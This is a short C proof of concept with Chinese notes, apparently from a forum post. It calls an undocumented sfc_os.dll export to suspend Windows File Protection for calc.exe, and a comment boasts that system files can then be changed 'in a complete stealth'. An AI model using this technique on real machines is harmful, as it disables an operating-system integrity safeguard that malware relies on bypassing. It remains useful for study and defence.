#include <stdio.h>
#include <windows.h>
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);
void Disable_WFP()
{
HINSTANCE hmod=LoadLibrary("sfc_os.dll");
CPP SetSfcFileException;
// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);
SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe",-1);
//Now we can modify the system file in a complete stealth.
}
void main()
{
Disable_WFP();
}
运行后,删除 C:\WINDOWS\SYSTEM32\CALC.EXE文件,不会自动恢复
Windows2K3 CN SP1 VC6 测试通过
好像说重启后会恢复,这个未测试,所以叫暂停